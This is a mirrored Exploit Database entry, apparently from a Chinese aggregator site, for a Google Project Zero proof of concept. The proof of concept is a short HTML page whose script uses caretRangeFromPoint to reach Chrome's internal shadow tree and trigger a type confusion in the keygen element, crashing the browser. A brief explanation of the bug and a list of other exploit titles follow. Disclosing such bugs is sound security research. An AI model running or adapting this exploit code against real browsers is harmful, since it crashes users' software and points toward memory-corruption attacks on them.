Google Chrome – ‘HTMLKeygenElement::shadowSelect()’ Type Confusion

Exploit Database
17 阅读

作者： Google Security Research

日期： 2017-02-01
类别：
- dos
平台：
- multiple
来源：https://www.exploit-db.com/exploits/41214/

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=994

Chrome bug:
https://bugs.chromium.org/p/chromium/issues/detail?id=666246

PoC:
-->

<keygen id="keygen_element" style="position:absolute; height: 100px; width: 100px;">
<script>
var range = document.caretRangeFromPoint(50, 50);
var shadow_tree_container = range.commonAncestorContainer;
shadow_tree_container.prepend("foo");
keygen_element.disabled = true;
</script>

<!--
What happens here:
1. caretRangeFromPoint() allows accessing (and modifying) userAgentShadowRoot from JavaScript
2. HTMLKeygenElement::shadowSelect() blindly casts the first child of the userAgentShadowRoot to HTMLSelectElement without checking the Node type.
-->

last Exploits
Google Chrome – ‘HTMLKeygenElement::shadowSelect()’ Type Confusion的更多信息

MelOn Player 1.0.11.x – Denial of Service (PoC)：
GIMP 2.8.0 – ‘.FIT’ File Format Denial of Service：
Socusoft Photo 2 Video Converter 8.0.0 – Local Buffer Overflow：
CodeBlocks 12.11 (OSX) – Crash (PoC)：
Perl 5.10 – Multiple Null Pointer Dereference Denial of Service Vulnerabilities：
Core FTP 2.0 – ‘XRMD’ Denial of Service (PoC)：
Unreal Tournament 3 2.1 – ‘STEAMBLOB’ Remote Denial of Service：
Adobe Flash – Pointer Crash in Button Handling：